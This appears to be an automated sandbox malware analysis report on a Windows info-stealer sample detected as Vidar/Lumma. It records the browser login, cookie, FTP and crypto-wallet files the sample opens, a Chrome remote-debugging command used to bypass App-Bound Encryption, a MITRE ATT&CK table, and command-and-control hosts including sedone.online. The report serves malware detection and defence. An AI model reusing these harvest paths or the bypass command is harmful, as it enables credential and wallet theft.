          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
          Source: Yara matchFile source: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dZKPE9gotO.exe PID: 2000, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Attempt to bypass Chrome Application-Bound Encryption
          Source: C:\Users\user\Desktop\dZKPE9gotO.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Yara detected Vidar stealer
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dZKPE9gotO.exe PID: 2000, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Native API          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		2
          Obfuscated Files or Information          		2
          OS Credential Dumping          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          Create Account          		1
          Extra Window Memory Injection          		22
          Software Packing          		1
          Credentials in Registry          		1
          Account Discovery          		Remote Desktop Protocol4
          Data from Local System          		21
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)111
          Process Injection          		1
          DLL Side-Loading          		Security Account Manager3
          File and Directory Discovery          		SMB/Windows Admin SharesData from Network Shared Drive1
          Remote Access Software          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Extra Window Memory Injection          		NTDS35
          System Information Discovery          		Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Masquerading          		LSA Secrets11
          Query Registry          		SSHKeylogging14
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
          Virtualization/Sandbox Evasion          		Cached Domain Credentials221
          Security Software Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
          Process Injection          		DCSync11
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
          Process Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576158 Sample: dZKPE9gotO.exe Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 56 t.me 2->56 58 sedone.online 2->58 66 Suricata IDS alerts for network traffic 2->66 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 9 other signatures 2->72 8 dZKPE9gotO.exe 41 2->8         started        12 msedge.exe 67 472 2->12         started        signatures3 process4 dnsIp5 62 t.me 149.154.167.99, 443, 49700 TELEGRAMRU United Kingdom 8->62 64 sedone.online 116.203.12.114, 443, 49701, 49703 HETZNER-ASDE Germany 8->64 74 Detected unpacking (changes PE section rights) 8->74 76 Detected unpacking (overwrites its own PE header) 8->76 78 Attempt to bypass Chrome Application-Bound Encryption 8->78 80 8 other signatures 8->80 14 msedge.exe 2 11 8->14         started        17 chrome.exe 8->17         started        20 WerFault.exe 8->20         started        23 cmd.exe 8->23         started        25 msedge.exe 12->25         started        27 msedge.exe 12->27         started        29 msedge.exe 12->29         started        31 msedge.exe 12->31         started        signatures6 process7 dnsIp8 82 Monitors registry run keys for changes 14->82 33 msedge.exe 14->33         started        44 192.168.2.7, 123, 138, 443 unknown unknown 17->44 46 127.0.0.1 unknown unknown 17->46 48 239.255.255.250 unknown Reserved 17->48 35 chrome.exe 17->35         started        42 C:\ProgramData\Microsoft\...\Report.wer, Unicode 20->42 dropped 38 conhost.exe 23->38         started        40 timeout.exe 23->40         started        50 18.173.219.84, 443, 49880, 49918 MIT-GATEWAYSUS United States 25->50 52 13.69.239.72, 443, 49917, 49955 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 25->52 54 20 other IPs or domains 25->54 file9 signatures10 process11 dnsIp12 60 www.google.com 172.217.21.36, 443, 49743, 49748 GOOGLEUS United States 35->60

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          dZKPE9gotO.exe76%ReversingLabsWin32.Trojan.LummaC
          dZKPE9gotO.exe100%AviraHEUR/AGEN.1312567
          dZKPE9gotO.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://sedone.online/CWz#100%Avira URL Cloudmalware
          https://sedone.online/oWF#100%Avira URL Cloudmalware
          http://anglebug.com/3205er0%Avira URL Cloudsafe
          https://sedone.online100%Avira URL Cloudmalware
          https://sedone.online/pW100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          chrome.cloudflare-dns.com
          		162.159.61.3
          		truefalse
            		high
            t.me
            		149.154.167.99
            		truefalse
              		high
              ssl.bingadsedgeextension-prod-europe.azurewebsites.net
              		94.245.104.56
              		truefalse
                		high
                sb.scorecardresearch.com
                		18.165.220.106
                		truefalse
                  		high
                  www.google.com
                  		172.217.21.36
                  		truefalse
                    		high
                    sedone.online
                    		116.203.12.114
                    		truefalse
                      		high
                      s-part-0035.t-0009.t-msedge.net
                      		13.107.246.63
                      		truefalse
                        		high
                        googlehosted.l.googleusercontent.com
                        		142.250.181.65
                        		truefalse
                          		high
                          clients2.googleusercontent.com
                          		unknown
                          		unknownfalse
                            		high
                            bzib.nelreports.net
                            		unknown
                            		unknownfalse
                              		high
                              assets.msn.com
                              		unknown
                              		unknownfalse
                                		high
                                deff.nelreports.net
                                		unknown
                                		unknownfalse
                                  		high
                                  ntp.msn.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734365270898&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                      		high
                                      https://assets.msn.com/statics/icons/favicon_newtabpage.pngfalse
                                        		high
                                        https://c.msn.com/c.gif?rnd=1734365264027&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=14874f7f2a824b9dbbfbe14fe01fe973&activityId=14874f7f2a824b9dbbfbe14fe01fe973&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=B76581ECD2E1499D95A0E1CBD8614B37&MUID=360240197938679F2CDC554E78216658false
                                          		high
                                          https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734365270097&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                            		high
                                            https://c.msn.com/c.gif?rnd=1734365264027&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=14874f7f2a824b9dbbfbe14fe01fe973&activityId=14874f7f2a824b9dbbfbe14fe01fe973&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0false
                                              		high

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabdZKPE9gotO.exe, 00000000.00000002.2206788011.0000000003B3F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1565639371.0000782402D70000.00000004.00000800.00020000.00000000.sdmp, Web Data.15.dr, VKXB16.0.dr, OPHDT2.0.drfalse
                                                		high
                                                https://mail.google.com/mail/?usp=installed_webappchrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/ac/?q=chrome.exe, 0000000A.00000002.1563661455.0000782402988000.00000004.00000800.00020000.00000000.sdmp, Web Data.15.dr, VKXB16.0.dr, OPHDT2.0.drfalse
                                                    		high
                                                    https://google-ohttp-relay-join.fastly-edge.com/.chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 0000000A.00000002.1554632085.0000782402278000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 0000000D.00000003.1612331110.0000399802480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://google-ohttp-relay-join.fastly-edge.com/1chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 0000000A.00000002.1564865767.0000782402B70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://docs.google.com/document/Jchrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 0000000A.00000002.1563515050.000078240295C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1527112152.0000782403174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1567347047.0000782403174000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562165163.0000782402681000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487281895.0000782403174000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://anglebug.com/4633chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://google-ohttp-relay-join.fastly-edge.com/5chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://anglebug.com/7382chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://google-ohttp-relay-join.fastly-edge.com/;chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://issuetracker.google.com/284462263msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://google-ohttp-relay-join.fastly-edge.com/8chrome.exe, 0000000A.00000003.1521145342.000078240377C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1521082067.000078240375C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEklychrome.exe, 0000000A.00000002.1562165163.0000782402681000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563061355.0000782402878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1567048584.0000782403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563661455.0000782402988000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://polymer.github.io/AUTHORS.txtchrome.exe, 0000000A.00000003.1487204067.0000782402B80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1566268797.0000782402EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487803754.000078240340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487226065.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485843062.00007824030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485959965.0000782403240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487524446.00007824026C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564776046.0000782402B4B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487281895.0000782403150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1486113020.00007824030FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1486179289.000078240320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1485926648.00007824031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487654825.0000782403268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487185901.0000782402E24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://docs.google.com/document/:chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 0000000A.00000003.1518214315.000078240360C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 0000000A.00000002.1555724218.00007824022EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564776046.0000782402B4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://anglebug.com/7714chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1562127760.0000782402650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://unisolated.invalid/chrome.exe, 0000000A.00000002.1564776046.0000782402B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://photos.google.com?referrer=CHROME_NTPchrome.exe, 0000000A.00000003.1487803754.000078240340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487524446.00007824026C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1487654825.0000782403268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.google.com/chrome/tips/chrome.exe, 0000000A.00000002.1563791843.00007824029F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1566658146.0000782402FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1560753957.00007824023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1564747541.0000782402B2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://drive.google.com/?lfhs=2chrome.exe, 0000000A.00000002.1564953387.0000782402BC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://anglebug.com/6248chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://ogs.google.com/widget/callout?eom=1chrome.exe, 0000000A.00000003.1527160907.0000782403E30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drfalse
                                                                                                          		high
                                                                                                          https://outlook.office.com/mail/compose?isExtension=true79872ae5-4bbb-4806-ba81-432692c582dd.tmp.15.drfalse
                                                                                                            		high
                                                                                                            http://anglebug.com/6929chrome.exe, 0000000A.00000002.1562901064.000078240281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://anglebug.com/5281chrome.exe, 0000000A.00000003.1482974584.0000782402580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482949926.0000782402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1563693225.00007824029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1482911965.0000782402FC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1613211018.0000399802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000D.00000003.1612767743.000039980258C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
